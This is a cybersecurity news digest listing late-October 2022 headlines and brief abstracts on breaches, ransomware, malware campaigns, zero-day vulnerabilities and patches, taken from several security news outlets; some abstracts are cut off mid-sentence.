October 2022
October 31, 2022 – Vulnerabilities
Mozilla Firefox fixes freezes caused by new Windows 11 feature
Abstract
Mozilla has fixed a known issue causing the Firefox web browser to freeze when copying text on Windows 11 devices where the Suggested Actions clipboard feature is enabled.
Source: BleepingComputer
October 31, 2022 – Breach
Label Printing Giant Multi-Color Corporation Discloses Data Breach
Abstract
An investigation launched into the incident has revealed that sensitive HR data might have been compromised, including “personnel files and information on enrollment in our benefits programs”.
Source: Security Week
October 31, 2022 – Denial Of Service
Fodcha DDoS Botnet Resurfaces with New Capabilities
Abstract
The threat actor behind the Fodcha distributed denial-of-service (DDoS) botnet has resurfaced with new capabilities, researchers reveal. This includes changes to its communication protocol and the ability to extort cryptocurrency payments in exchange for stopping the DDoS attack against a target, Qihoo 360's Network Security Research Lab said in a report published last week. Fodcha first came to light earlier this April, with the malware propagating through known vulnerabilities in Android and IoT devices as well as weak Telnet or SSH passwords. The cybersecurity company said that Fodcha has evolved into a large-scale botnet with over 60,000 active nodes and 40 command-and-control (C2) domains that can "easily generate more than 1 Tbps traffic." Peak activity is said to have occurred on October 11, 2022, when the malware targeted 1,396 devices in a single day. The top countries singled out by the botnet since late June 2022 comprise China, the U.S., Singapore,
Source: The Hacker News
October 31, 2022 – Vulnerabilities
VMware warns of the public availability of CVE-2021-39144 exploit code
Abstract
VMware warned of the availability of a public exploit for a recently addressed critical remote code execution flaw in NSX Data Center for vSphere (NSX-V). VMware warned of the existence of a public exploit targeting a recently addressed critical remote...
Source: Security Affairs
October 31, 2022 – Breach
Hackers selling access to 576 corporate networks for $4 million
Abstract
A new report shows that hackers are selling access to 576 corporate networks worldwide for a total cumulative sales price of $4,000,000, fueling attacks on the enterprise.
Source: BleepingComputer
October 31, 2022 – Malware
Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure
Abstract
While APTs get the most breathless coverage in the news, many threat actors have money on their mind rather than espionage. You can learn a lot about the innovations used by these financially motivated groups by watching banking Trojans.
Source: Palo Alto Networks
October 31, 2022 – Education
Tips for Choosing a Pentesting Company
Abstract
In today's world of automated hacking systems, frequent data breaches and consumer protection regulations such as GDPR and PCI DSS, penetration testing is now an essential security requirement for organisations of all sizes. But what should you look for when choosing the right provider? The sheer number of providers can be daunting, and finding one which can deliver a high-quality test at a reasonable price is not easy. How do you know if they're any good? What level of security expertise was included in the report? Is your application secure, or did the supplier simply not find the weaknesses? There are no easy answers, but you can make it easier by asking the right questions up front. The most important considerations fall into three categories: certifications, experience, and price. Certifications: Certifications are the best place to start, as they provide a quick shortcut for building trust. There's no shortage of professional certifications available, but one of t
Source: The Hacker News
October 31, 2022 – Vulnerabilities
Actively exploited Windows Mark-of-the-Web zero-day received an unofficial patch
Abstract
An unofficial patch for an actively exploited flaw in Microsoft Windows that allows bypassing Mark-of-the-Web (MotW) protections. 0patch released an unofficial patch to address an actively exploited security vulnerability in Microsoft Windows that...
Source: Security Affairs
October 31, 2022 – Policy and Law
Chegg sued by FTC after suffering four data breaches within 3 years
Abstract
The U.S. Federal Trade Commission (FTC) has sued education technology company Chegg after it exposed the sensitive information of tens of millions of customers and employees in four data breaches suffered since 2017.
Source: BleepingComputer
October 31, 2022 – Attack
Ransomware Attack on Australian Defense Contractor May Expose Private Communications Between ADF Members
Abstract
A ransomware attack may have resulted in data related to private communications between current and former Australian defense force members being compromised, with as many as 40,000 records at risk.
Source: The Guardian
October 31, 2022 – Vulnerabilities
Unofficial Patch Released for New Actively Exploited Windows MotW Vulnerability
Abstract
An unofficial patch has been made available for an actively exploited security flaw in Microsoft Windows that makes it possible for files signed with malformed signatures to sneak past Mark-of-the-Web (MotW) protections. The fix, released by 0patch, arrives weeks after HP Wolf Security disclosed a Magniber ransomware campaign that targets users with fake security updates which employ a JavaScript file to proliferate the file-encrypting malware. While files downloaded from the internet in Windows are tagged with a MotW flag to prevent unauthorized actions, it has since been found that corrupt Authenticode signatures can be used to allow the execution of arbitrary executables without any SmartScreen warning. Authenticode is a Microsoft code-signing technology that authenticates the identity of the publisher of a particular piece of software and verifies whether the software was tampered with after it was signed and published. "The [JavaScript] file actually has the Mo
Source: The Hacker News
October 31, 2022 – Malware
Wannacry, the hybrid malware that brought the world to its knees
Abstract
Reflecting on the Wannacry ransomware attack, the lesson learnt and why most organizations are still ignoring it. In the early afternoon of Friday 12 May 2017, the media broke the news of a global computer security attack carried out through...
Source: Security Affairs
October 31, 2022 – Government
NSA shares supply chain security tips for software suppliers
Abstract
NSA, CISA, and the Office of the Director of National Intelligence (ODNI) have shared a new set of suggested practices that software suppliers (vendors) can follow to secure the supply chain.
Source: BleepingComputer
October 31, 2022 – Breach
Air New Zealand Faces Cybersecurity Breach, Multiple Accounts Compromised
Abstract
The breach was an instance of “credential stuffing”, in which scammers used email and password information stolen from another online source to hack into Air NZ Airpoints accounts.
Source: Stuff NZ
October 31, 2022 – Vulnerabilities
Samsung Galaxy Store Bug Could’ve Let Hackers Secretly Install Apps on Targeted Devices
Abstract
A now-patched security flaw has been disclosed in the Galaxy Store app for Samsung devices that could potentially trigger remote command execution on affected phones. The vulnerability, which affects Galaxy Store version 4.5.32.4, relates to a cross-site scripting (XSS) bug that occurs when handling certain deep links. An independent security researcher has been credited with reporting the issue. "Here, by not checking the deep link securely, when a user accesses a link from a website containing the deeplink, the attacker can execute JS code in the webview context of the Galaxy Store application," SSD Secure Disclosure said in an advisory posted last week. XSS attacks allow an adversary to inject and execute malicious JavaScript code when visiting a website from a browser or another application. The issue identified in the Galaxy Store app has to do with how deep links are configured for Samsung's Marketing & Content Service (MCS), potentially leading to
Source: The Hacker News
October 31, 2022 – Attack
Snatch group claims to have hacked military provider HENSOLDT France
Abstract
The Snatch ransomware group claims to have hacked HENSOLDT France, a company specializing in military and defense electronics. The Snatch ransomware group claims to have hacked the French company HENSOLDT France. HENSOLDT is a company specializing...
Source: Security Affairs
October 31, 2022 – Hacker
Hacking group abuses antivirus software to launch LODEINFO malware
Abstract
The Chinese Cicada hacking group, tracked as APT10, was observed abusing security software to install a new version of the LODEINFO malware against Japanese organizations.
Source: BleepingComputer
October 31, 2022 – General
Kids today are ‘overly confident’ about their skills online—losing $101.4 million to hackers last year
Abstract
People under the age of 20 lost $101.4 million to online scams in 2021 as compared to just $8.3 million in 2017, according to a recent study from cybersecurity startup Social Catfish, which cited figures from the FBI’s Internet Crime Report.
Source: CNBC
October 31, 2022 – Vulnerabilities
GitHub Repojacking Bug Could’ve Allowed Attackers to Takeover Other Users’ Repositories
Abstract
Cloud-based repository hosting service GitHub has addressed a high-severity security flaw that could have been exploited to create malicious repositories and mount supply chain attacks. The RepoJacking technique, disclosed by Checkmarx, entails a bypass of a protection mechanism called popular repository namespace retirement, which aims to prevent developers from pulling unsafe repositories with the same name. The issue was addressed by the Microsoft-owned subsidiary on September 19, 2022 following responsible disclosure. RepoJacking occurs when a creator of a repository opts to change the username, potentially enabling a threat actor to claim the old username and publish a rogue repository with the same name in an attempt to trick users into downloading them. While Microsoft's countermeasure "retire[s] the namespace of any open source project that had more than 100 clones in the week leading up to the owner's account being renamed or deleted," Checkmarx
Source: The Hacker News
October 31, 2022 – Vulnerabilities
GitHub flaw could have allowed attackers to takeover repositories of other users
Abstract
A critical flaw in the cloud-based repository hosting service GitHub could've allowed attackers to takeover other repositories. The cloud-based repository hosting service GitHub has addressed a vulnerability that could have been exploited by threat...
Source: Security Affairs
October 31, 2022 – Attack
Indianapolis Low-Income Housing Agency Hit by Ransomware Attack
Abstract
The attack delayed the Indianapolis Housing Agency’s ability to send out October rent payments to landlords for the federal housing choice voucher program, also known as Section 8, which 8,000 Indianapolis families depend on.
Source: Security Week
October 31, 2022 – General
Bosses say they’re serious about cybersecurity. It’s time for them to prove it
Abstract
While the post-pandemic tech boom has been a blessing for tech-savvy professionals with a knack for anything software related, it has also left companies more exposed than ever to the dangers lurking in cyberspace.
Source: ZDNet
October 31, 2022 – Malware
Malicious dropper apps on Play Store totaled 30.000+ installations
Abstract
ThreatFabric researchers discovered five malicious dropper apps on Google Play Store with more than 130,000 downloads. Researchers at ThreatFabric have discovered five malicious dropper apps on the official Google Play Store. The malicious dropper...
Source: Security Affairs
October 31, 2022 – Malware
ShadowPad Malware Analysis Highlights C2 Infrastructure and New Associations
Abstract
Between September 2021 and September 2022, 83 ShadowPad C2 servers (75 unique IPs) were identified on the internet. ShadowPad supports six C2 protocols: TCP, SSL, HTTP, HTTPS, UDP, and DNS.
Source: Cyware Alerts - Hacker News
October 31, 2022 – Attack
DEV-0950 Uses Raspberry Robin Worm in Cl0p Ransomware Attacks
Abstract
The Raspberry Robin malware, which was initially spread via external USB drives, is now using additional infection methods and working with other malware families in its recent cyberattacks.
Source: Cyware Alerts - Hacker News
October 30, 2022 – Malware
New Azov data wiper tries to frame researchers and BleepingComputer
Abstract
A new and destructive 'Azov Ransomware' data wiper is being heavily distributed through pirated software, key generators, and adware bundles, trying to frame well-known security researchers by claiming they are behind the attack.
Source: BleepingComputer
October 30, 2022 – Breach
Former British Prime Minister Liz Truss’s phone was allegedly hacked by Russian spies
Abstract
According to the Daily Mail, Former British Prime Minister Liz Truss's personal phone was hacked by Russian spies. The personal mobile phone of British Prime Minister Liz Truss was hacked by cyber spies suspected of working for the Kremlin, the Daily...
Source: Security Affairs
October 30, 2022 – Vulnerabilities
Actively exploited Windows MoTW zero-day gets unofficial patch
Abstract
A free unofficial patch has been released for an actively exploited zero-day that allows files signed with malformed signatures to bypass Mark-of-the-Web security warnings in Windows 10 and Windows 11.
Source: BleepingComputer
October 30, 2022 – Criminals
German BKA arrested the alleged operator of Deutschland im Deep Web darknet market
Abstract
German police arrested a student who is suspected of being the administrator of the 'Deutschland im Deep Web' (DiDW) darknet marketplace. Germany's Federal Criminal Police Office (BKA) has arrested a student (22) in Bavaria, who is suspected of being...
Source: Security Affairs
October 30, 2022 – Attack
BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider
Abstract
The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider, for more than...
Source: Security Affairs
October 30, 2022 – Attack
Air New Zealand warns of an ongoing credential stuffing attack
Abstract
Air New Zealand suffered a security breach; multiple customers have been locked out of their accounts after the incident. Air New Zealand suffered a security breach; threat actors attempted to access customers' accounts by carrying out credential-stuffing...
Source: Security Affairs
October 30, 2022 – General
Security Affairs newsletter Round 391
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you also want to receive the free newsletter with the international press, subscribe here. Twilio...
Source: Security Affairs
October 29, 2022 – Breach
Bed Bath & Beyond reviewing possible data breach
Abstract
Bed Bath & Beyond said that it has no reason to believe that any sensitive or personally identifiable information was accessed and that this cybersecurity incident would likely not have a material impact on the company.
Source: Yahoo Finance
October 29, 2022 – Breach
Twilio Reveals Another Breach from the Same Hackers Behind the August Hack
Abstract
Communication services provider Twilio this week disclosed that it experienced another "brief security incident" in June 2022 perpetrated by the same threat actor behind the August hack that resulted in unauthorized access of customer information. The security event occurred on June 29, 2022, the company said in an updated advisory shared this week, as part of its probe into the digital break-in. "In the June incident, a Twilio employee was socially engineered through voice phishing (or 'vishing') to provide their credentials, and the malicious actor was able to access customer contact information for a limited number of customers," Twilio said. It further said the access gained following the successful attack was identified and thwarted within 12 hours, and that it had alerted impacted customers on July 2, 2022. The San Francisco-based firm did not reveal the exact number of customers impacted by the June incident, and why the disclosure was made
Source: The Hacker News
October 29, 2022 – Malware
Defeating Guloader Anti-Analysis Technique
Abstract
The Guloader malware uses the control flow obfuscation technique to hide its functionalities and evade detection. This technique impedes both static and dynamic analysis.
Source: Palo Alto Networks
October 29, 2022 – Solution
New open-source tool scans public AWS S3 buckets for secrets
Abstract
A new open-source 'S3crets Scanner' scanner allows researchers and red-teamers to search for 'secrets' mistakenly stored in publicly exposed or company-owned Amazon AWS S3 storage buckets.
Source: BleepingComputer
October 29, 2022 – Breach
Twilio discloses another security incident that took place in June
Abstract
Twilio suffered another brief security incident in June 2022; the attack was conducted by the same threat actor as the August hack. The Communications company Twilio announced that it suffered another "brief security incident" on June 29, 2022,...
Source: Security Affairs
October 29, 2022 – Attack
A massive cyberattack hit Slovak and Polish Parliaments
Abstract
The Slovak and Polish parliaments were hit by a massive cyber attack, and the voting system in Slovakia's legislature was brought down. A massive cyber attack hit the Slovak and Polish parliaments, reported the authorities. The cyber attack brought...
Source: Security Affairs
October 29, 2022 – Business
How will Twitter change under Elon Musk?
Abstract
Cybhorus CEO Pierluigi Paganini talks to TRT World about Elon Musk completing his $44 billion deal to buy Twitter and what changes he will make to the social media platform. Of course, the first impact will be on the leadership; Elon Musk was critical...
Source: Security Affairs
October 28, 2022 – Vulnerabilities
ConnectWise fixes RCE bug exposing thousands of servers to attacks
Abstract
ConnectWise has released security updates to address a critical vulnerability in the ConnectWise Recover and R1Soft Server Backup Manager (SBM) secure backup solutions.
Source: BleepingComputer
October 28, 2022 – Phishing
New LinkedIn Phishing Campaign Bypasses Google Protection
Abstract
The phishing campaign targeted 500 mailboxes of employees from a national travel organization. The email comes with the subject line "We noticed some unusual activity", pretending to be from LinkedIn.
Source: Cyware Alerts - Hacker News
October 28, 2022 – Vulnerabilities
High-Severity Flaws in Juniper Junos OS Affect Enterprise Networking Devices
Abstract
Multiple high-severity security flaws have been disclosed as affecting Juniper Networks devices, some of which could be exploited to achieve code execution. Chief among them is a remote pre-authenticated PHP archive file deserialization vulnerability (CVE-2022-22241, CVSS score: 8.1) in the J-Web component of Junos OS, according to Octagon Networks researcher Paulos Yibelo. "This vulnerability can be exploited by an unauthenticated remote attacker to get remote phar files deserialized, leading to arbitrary file write, which leads to a remote code execution (RCE)," Yibelo said in a report shared with The Hacker News. Also identified are five other issues, which are listed as follows:
CVE-2022-22242 (CVSS score: 6.1) - A pre-authenticated reflected XSS on the error page ("error.php"), allowing a remote adversary to siphon Junos OS admin session and chained with other flaws that require authentication.
CVE-2022-22243 (CVSS score: 4.3) & CVE-2022-22
Source: The Hacker News
October 28, 2022 – Vulnerabilities
Multiple vulnerabilities affect the Juniper Junos OS
Abstract
Juniper Networks devices are affected by multiple high-severity issues, including code execution vulnerabilities. Multiple high-severity security vulnerabilities have been discovered in Juniper Networks devices. "Multiple vulnerabilities have been...
Source: Security Affairs
October 28, 2022 – Ransomware
The Week in Ransomware - October 28th 2022 - Healthcare leaks
Abstract
This week, we learned of healthcare data leaks out of Australia, information about existing attacks, and reports on how ransomware gangs operate and partner with malware developers for initial access.
Source: BleepingComputer
October 28, 2022 – APT
Kimsuky APT Adds New Android Malware to its Arsenal
Abstract
As per the findings by S2W’s threat research and intelligence center, the three new malware, FastFire, FastViewer, and FastSpy, are masquerading as APKs for three utility tools on Google Play Store.
Source: Cyware Alerts - Hacker News
October 28, 2022 – Malware
These Dropper Apps On Play Store Targeting Over 200 Banking and Cryptocurrency Wallets
Abstract
Five malicious dropper Android apps with over 130,000 cumulative installations have been discovered on the Google Play Store distributing banking trojans like SharkBot and Vultur, which are capable of stealing financial data and performing on-device fraud. "These droppers continue the unstopping evolution of malicious apps sneaking to the official store," Dutch mobile security firm ThreatFabric told The Hacker News in a statement. "This evolution includes following newly introduced policies and masquerading as file managers and overcoming limitations by side-loading the malicious payload through the web browser." Targets of these droppers include 231 banking and cryptocurrency wallet apps from financial institutions in Italy, the U.K., Germany, Spain, Poland, Austria, the U.S., Australia, France, and the Netherlands. Dropper apps on official app stores like Google Play have increasingly become a popular and efficient technique to distribute banking m
Source: The Hacker News
October 28, 2022 – Vulnerabilities
Google fixes a new actively exploited Chrome zero-day, it is the seventh one this year
Abstract
Google Thursday released an emergency patch for Chrome 107 to address the actively exploited zero-day vulnerability CVE-2022-3723. Google released an emergency update for Chrome 107 to address an actively exploited zero-day vulnerability...
Source: Security Affairs
October 28, 2022 – Outage
Largest EU copper producer Aurubis suffers cyberattack, IT outage
Abstract
German copper producer Aurubis has announced that it suffered a cyberattack that forced it to shut down IT systems to prevent the attack's spread.
Source: BleepingComputer
October 28, 2022 – Attack
IT Systems at Polish, Slovak Parliaments Hit by Cyberattacks
Abstract
"The attack was multi-directional, including from inside the Russian Federation," the Polish Senate said in a statement. The Slovak parliament's deputy speaker Gabor Grendel told AFP that "Parliament's entire computer network has been paralysed".
Source: Security Week
October 28, 2022 – Education
Cloud Security Made Simple in New Guidebook For Lean Teams
Abstract
Cloud computing was the lifeline that kept many companies running during the pandemic. But it was a classic case of medicine that comes with serious side effects. Having anywhere, anytime access to data and apps gives companies tremendous flexibility in a fast-changing world, plus the means to scale and customize IT at will. The cloud is an asset or upgrade in almost every way. With one glaring exception: cybersecurity. The cloud promised to make companies more secure and security more straightforward. Yet over the same time period that the cloud took over computing, cyber attacks grew steadily worse while security teams felt increasingly overwhelmed. Why? We will explain shortly. For lean security teams, the more important question is how to make cloud security work, especially as the cloud footprint grows (a lot) faster than security resources. Will the cloud always cast a shadow on cybersecurity? Not with the strategy outlined in a free ebook from Cynet called "Th
Source: The Hacker News
October 28, 2022 – Vulnerabilities
Apple backports fixes for CVE-2022-42827 zero-day to older iPhones, iPads
Abstract
Apple released updates to backport the recently released security patches for the CVE-2022-42827 zero-day to older iPhones and iPads. Apple has released new security updates to backport security patches released this week to address actively exploited...
Source: Security Affairs
October 28, 2022 – Criminals
Student arrested for running one of Germany’s largest dark web markets
Abstract
The Federal Criminal Police Office (BKA) in Germany has arrested a 22-year-old student in Bavaria, who is suspected of being the administrator of 'Deutschland im Deep Web' (DiDW) 3, one of the largest darknet markets in the country.
Source: BleepingComputer
October 28, 2022 – Vulnerabilities
VMWare patches RCE exploit in NSX Manager
Abstract
The vulnerability, caused by an old deserialization bug in an outdated Java library, could be abused to achieve pre-authentication remote code execution (RCE) on the host computer.
Source: The Daily Swig
October 28, 2022 – Hacker
Researchers Uncover Stealthy Techniques Used by Cranefly Espionage Hackers
Abstract
A recently discovered hacking group known for targeting employees dealing with corporate transactions has been linked to a new backdoor called Danfuan. This hitherto undocumented malware is delivered via another dropper called Geppei, researchers from Symantec, by Broadcom Software, said in a report shared with The Hacker News. The dropper "is being used to install a new backdoor and other tools using the novel technique of reading commands from seemingly innocuous Internet Information Services (IIS) logs," the researchers said. The toolset has been attributed by the cybersecurity company to a suspected espionage actor called UNC3524, aka Cranefly, which first came to light in May 2022 for its focus on bulk email collection from victims who deal with mergers and acquisitions and other financial transactions. One of the group's key malware strains is QUIETEXIT, a backdoor deployed on network appliances that do not support antivirus or endpoint detection, such
Source: The Hacker News
October 28, 2022 – Insider Threat
New York Post hacked? No, the culprit is an employee
Abstract
Threat actors hacked the website and Twitter account of the New York Post and published offensive messages against US politicians. New York Post confirmed that it was hacked; its website and Twitter account were used by the attackers to publish offensive...
Source: Security Affairs
October 28, 2022 – Vulnerabilities
Exploit released for critical VMware RCE vulnerability, patch now
Abstract
Proof-of-concept exploit code is now available for a pre-authentication remote code execution (RCE) vulnerability allowing attackers to execute arbitrary code remotely with root privileges on unpatched Cloud Foundation and NSX Manager appliances.
Source: BleepingComputer
October 28, 2022 – Education
Implementing Defense in Depth to Prevent and Mitigate Cyber Attacks
Abstract
The increased use of information technology in our everyday life and business has led to cyber-attacks becoming more sophisticated and large-scale. For organizations to thrive in this era of technology, they must develop robust security strategies to detect and mitigate attacks. Defense in depth is a strategy in which companies use multiple layers of security measures to safeguard assets. A well-implemented defense in depth can help organizations prevent and mitigate ongoing attacks. Defense in depth uses various cutting-edge security tools to safeguard a business's endpoints, data, applications, and networks. The objective is to prevent cyber threats, but a robust defense-in-depth approach also thwarts ongoing attacks and prevents further damage. How organizations can implement defense in depth: The image above shows the various layers of security that organizations must implement. Below we describe ideas that companies should consider for each layer. Governance and risk mana
Source: The Hacker News
October 28, 2022 – Vulnerabilities
Google fixes seventh Chrome zero-day exploited in attacks this year
Abstract
Google has released an emergency security update for the Chrome desktop web browser to address a single vulnerability known to be exploited in attacks.
Source: BleepingComputer
October 28, 2022 – Vulnerabilities
Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability
Abstract
Google on Thursday rolled out emergency fixes to contain an actively exploited zero-day flaw in its Chrome web browser. The vulnerability, tracked as CVE-2022-3723, has been described as a type confusion flaw in the V8 JavaScript engine. Security researchers Jan Vojtěšek, Milánek, and Przemek Gmerek of Avast have been credited with reporting the flaw on October 25, 2022. "Google is aware of reports that an exploit for CVE-2022-3723 exists in the wild," the internet giant acknowledged in an advisory without getting into more specifics about the nature of the attacks. CVE-2022-3723 is the third actively exploited type confusion bug in V8 this year after CVE-2022-1096 and CVE-2022-1364. The latest fix also marks the resolution of the seventh zero-day in Google Chrome since the start of 2022:
CVE-2022-0609 - Use-after-free in Animation
CVE-2022-1096 - Type confusion in V8
CVE-2022-1364 - Type confusion in V8
CVE-2022-2294 - Heap buffer overflow in WebRTC
Source: The Hacker News
October 28, 2022 – Hacker
Hackers use Microsoft IIS web server logs to control malware
Abstract
The Cranefly hacking group, aka UNC3524, uses a previously unseen technique of controlling malware on infected devices via Microsoft Internet Information Services (IIS) web server logs.
Source: BleepingComputer
October 28, 2022 – Criminals
Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints
Abstract
The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware. It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC) said in a detailed write-up. Raspberry Robin, also called QNAP Worm owing to the use of compromised QNAP storage servers for command-and-control, is the name given to a malware by cybersecurity company Red Canary that spreads to Windows systems through infected USB drives. MSTIC is keeping tabs on the activity group behind the USB-based Raspberry Robin infections as DEV-0856, adding it's aware of at least four confirmed entry points that all have the likely end goal of deploying ransomware. The tech giant's cybersecurity team said that Raspberry Robin has
Source: The Hacker News
October 28, 2022 – Malware
Android malware droppers with 130K installs found on Google Play
Abstract
A set of Android malware droppers were found infiltrating the Google Play store to install malicious programs by pretending to be app updates.
Source: BleepingComputer
October 27, 2022 – Vulnerabilities
Apple fixes recently disclosed zero-day on older iPhones, iPads
Abstract
Apple has released new security updates to backport patches released earlier this week to older iPhones and iPads, addressing an actively exploited zero-day bug.
Source: BleepingComputer
October 27, 2022 – Attack
Australian Clinical Labs Suffers Major Hack Affecting 223,000 Accounts Full Text
Abstract
Medlab became aware of unauthorized third-party access to its IT system in February and a month later, was informed by the Australian Cyber Security Centre (ACSC) that it may have been the victim of a ransomware incident.Yahoo Finance
October 27, 2022 – Policy and Law
British Hacker Charged for Operating “The Real Deal” Dark Web Marketplace
Abstract
A 34-year-old U.K. national has been arraigned in the U.S. for operating a dark web marketplace called The Real Deal that specialized in the sale of hacking tools and stolen login credentials. Daniel Kaye, who went by a litany of pseudonyms including Popopret, Bestbuy, UserL0ser, and Spdrman, has been charged with five counts of access device fraud and one count of money laundering conspiracy. Kaye was indicted in April 2021, and subsequently consented to his extradition from Cyprus to the U.S. in September 2022. "While living overseas, this defendant allegedly operated an illegal website that made hacking tools and login credentials available for purchase, including those for U.S. government agencies," said U.S. Attorney Ryan K. Buchanan. Court documents show that The Real Deal, until its shutdown in 2016, functioned as a market for illicit items, including stolen account logins for U.S. government computers, bank accounts, and social media platforms such as Twitter and… (Source: The Hacker News)
October 27, 2022 – Criminals
Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs
Abstract
The DEV-0950 group used Clop ransomware to encrypt the networks of organizations previously infected with the Raspberry Robin worm. Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks. Data... (Source: Security Affairs)
October 27, 2022 – Ransomware
Microsoft links Raspberry Robin worm to Clop ransomware attacks
Abstract
Microsoft says a threat group tracked as DEV-0950 used Clop ransomware to encrypt the network of a victim previously infected with the Raspberry Robin worm. (Source: BleepingComputer)
October 27, 2022 – Vulnerabilities
Windows Mark of the Web Zero-Days Remain Patchless, Under Exploit
Abstract
Two separate vulnerabilities exist in different versions of Windows that allow attackers to sneak malicious attachments and files past Microsoft's Mark of the Web (MoTW) security feature. (Source: Dark Reading)
October 27, 2022 – Malware
Researchers Expose Over 80 ShadowPad Malware C2 Servers
Abstract
As many as 85 command-and-control (C2) servers supporting the ShadowPad malware have been discovered since September 2021, with infrastructure detected as recently as October 16, 2022. That's according to VMware's Threat Analysis Unit (TAU), which studied three ShadowPad variants using TCP, UDP, and HTTP(S) protocols for C2 communications. ShadowPad, seen as a successor to PlugX, is a modular malware platform privately shared among multiple Chinese state-sponsored actors since 2015. Taiwanese cybersecurity firm TeamT5, earlier this May, disclosed details of another China-nexus modular implant named Pangolin8RAT, which is believed to be the successor of the PlugX and ShadowPad malware families, linking it to a threat group dubbed Tianwu. An analysis of the three ShadowPad artifacts, which have previously been put to use by Winnti, Tonto Team, and an emerging threat cluster codenamed Space Pirates, made it possible to discover the C2 servers by scanning th… (Source: The Hacker News)
October 27, 2022 – Breach
Thomson Reuters collected and leaked at least 3TB of sensitive data
Abstract
The multinational media conglomerate Thomson Reuters left a database with sensitive customer and corporate data exposed online. Original post at https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/ Thomson Reuters, a multinational... (Source: Security Affairs)
October 27, 2022 – Breach
Australian Clinical Labs says patient data stolen in ransomware attack
Abstract
Australian Clinical Labs (ACL) has disclosed a February 2022 data breach that impacted its Medlab Pathology business, exposing the medical records and other sensitive information of 223,000 people. (Source: BleepingComputer)
October 27, 2022 – Phishing
LinkedIn Phishing Spoof Bypasses Google Workspace Security
Abstract
A phishing email purportedly from LinkedIn with the subject line "We noticed some unusual activity" was discovered targeting users at a travel organization, in an attempt to pilfer their credentials on the social media platform. (Source: Dark Reading)
October 27, 2022 – Ransomware
Ransomware: Open Source to the Rescue
Abstract
Automobile, Energy, Media, Ransomware? When thinking about verticals, one may not instantly think of cyber-criminality. Yet every move made by governments, clients, and private contractors screams toward normalizing those menaces as a new vertical. Ransomware has every trait of a classical economic vertical: a thriving ecosystem of insurers, negotiators, software providers, and managed service experts. This cybercrime branch looks at a loot stash that counts for trillions of dollars. The cybersecurity industry is too happy to provide services, software, and insurance to accommodate this new normal. Intense insurer lobbying in France led the finance ministry to give a positive opinion about reimbursing ransoms, against the very advice of its government's cybersecurity branch. The market is so big and juicy that no one can get in the way of "the development of the cyber insurance market." In the US, Colonial Pipeline is seeking tax reductions from the loss incu… (Source: The Hacker News)
October 27, 2022 – Vulnerabilities
SiriSpy flaw allows eavesdropping on users’ conversations with Siri
Abstract
SiriSpy is a vulnerability affecting Apple iOS and macOS that allowed apps to eavesdrop on users' conversations with Siri. SiriSpy is a now-patched vulnerability, tracked as CVE-2022-32946, in Apple's iOS and macOS that could have potentially allowed... (Source: Security Affairs)
October 27, 2022 – Malware
Drinik Android malware now targets users of 18 Indian banks
Abstract
A new version of the Drinik Android banking trojan targets 18 Indian banks, masquerading as the country's official tax management app to steal victims' personal information and banking credentials. (Source: BleepingComputer)
October 27, 2022 – Disinformation
A Pro-China Disinfo Campaign Is Targeting US Elections—Badly
Abstract
On Wednesday, Mandiant published new findings about a group it calls Dragonbridge, which it has seen for years promoting pro-Chinese interests in fake grassroots social media campaigns designed to influence politics in Taiwan and Hong Kong. (Source: Wired)
October 27, 2022 – Vulnerabilities
Apple iOS and macOS Flaw Could’ve Let Apps Eavesdrop on Your Conversations with Siri
Abstract
A now-patched security flaw in Apple's iOS and macOS operating systems could have potentially enabled apps with Bluetooth access to eavesdrop on conversations with Siri. Apple said "an app may be able to record audio using a pair of connected AirPods," adding it addressed the Core Bluetooth issue in iOS 16.1 with improved entitlements. Credited with discovering and reporting the bug in August 2022 is app developer Guilherme Rambo. The bug, dubbed SiriSpy, has been assigned the identifier CVE-2022-32946. "Any app with access to Bluetooth could record your conversations with Siri and audio from the iOS keyboard dictation feature when using AirPods or Beats headsets," Rambo said in a write-up. "This would happen without the app requesting microphone access permission and without the app leaving any trace that it was listening to the microphone." The vulnerability, according to Rambo, relates to a service called DoAP that's included in AirPo… (Source: The Hacker News)
October 27, 2022 – Criminals
British hacker arraigned for running The Real Deal dark web marketplace
Abstract
A well-known British hacker was charged by U.S. authorities for allegedly running 'The Real Deal' dark web marketplace. The British hacker Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) (34) was charged by the U.S. DoJ for allegedly... (Source: Security Affairs)
October 27, 2022 – Attack
Twilio discloses another hack from June, blames voice phishing
Abstract
Cloud communications company Twilio disclosed a new data breach stemming from a June 2022 security incident in which the same attackers behind the August hack accessed some customers' information. (Source: BleepingComputer)
October 27, 2022 – Government
German cyber agency warns threat situation is ‘higher than ever’
Abstract
Germany's federal cybersecurity office BSI warned on Tuesday that ransomware, political hacking, and other cybersecurity threats facing the country are "higher than ever." (Source: The Record)
October 27, 2022 – Breach
Australian Health Insurer Medibank Suffers Breach Exposing 3.9 Million Customers’ Data
Abstract
Australian health insurance firm Medibank on Wednesday disclosed that the personal information of all of its customers had been accessed without authorization following a recent ransomware attack. In an update to its ongoing investigation into the incident, the firm said the attackers had access to "significant amounts of health claims data" as well as personal data belonging to its ahm health insurance subsidiary and international students. Medibank, which is one of the largest Australian private health insurance providers, serves about 3.9 million customers across the country. "We have evidence that the criminal has removed some of this data and it is now likely that the criminal has stolen further personal and health claims data," the company further added. "As a result, we expect that the number of affected customers could grow substantially." The company also said it's continuing its probe to determine what specific data has been stolen in th… (Source: The Hacker News)
October 27, 2022 – Attack
New York Post hacked with offensive headlines targeting politicians
Abstract
New York Post confirmed today that it was hacked after its website and Twitter account were used by the attackers to publish offensive headlines and tweets targeting U.S. politicians. (Source: BleepingComputer)
October 27, 2022 – Cryptocurrency
